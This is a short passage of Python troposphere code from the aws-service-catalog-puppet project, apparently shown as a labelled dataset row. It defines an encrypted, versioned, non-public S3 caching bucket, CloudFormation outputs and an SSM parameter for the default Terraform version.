caching_bucket = template.add_resource(s3.Bucket('CachingBucket', PublicAccessBlockConfiguration=s3.PublicAccessBlockConfiguration(BlockPublicAcls=True, BlockPublicPolicy=True, IgnorePublicAcls=True, RestrictPublicBuckets=True), BucketEncryption=s3.BucketEncryption(ServerSideEncryptionConfiguration=[s3.ServerSideEncryptionRule(ServerSideEncryptionByDefault=s3.ServerSideEncryptionByDefault(SSEAlgorithm='AES256'))]), Tags=t.Tags.from_dict(**{'ServiceCatalogPuppet:Actor': 'Framework'}), BucketName=t.Sub('sc-puppet-caching-bucket-${AWS::AccountId}-${AWS::Region}'), VersioningConfiguration=s3.VersioningConfiguration(Status='Enabled')))
template.add_output(t.Output('CloudFormationEventsQueueArn', Value=t.GetAtt(cloud_formation_events_queue, 'Arn')))
template.add_output(t.Output('Version', Value=t.GetAtt(param, 'Value')))
template.add_output(t.Output('ManualApprovalsParam', Value=t.GetAtt(manual_approvals_param, 'Value')))
template.add_resource(ssm.Parameter('DefaultTerraformVersion', Type='String', Name=constants.DEFAULT_TERRAFORM_VERSION_PARAMETER_NAME, Value=constants.DEFAULT_TERRAFORM_VERSION_VALUE))
return template
|
aws-service-catalog-puppet
|
positive
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.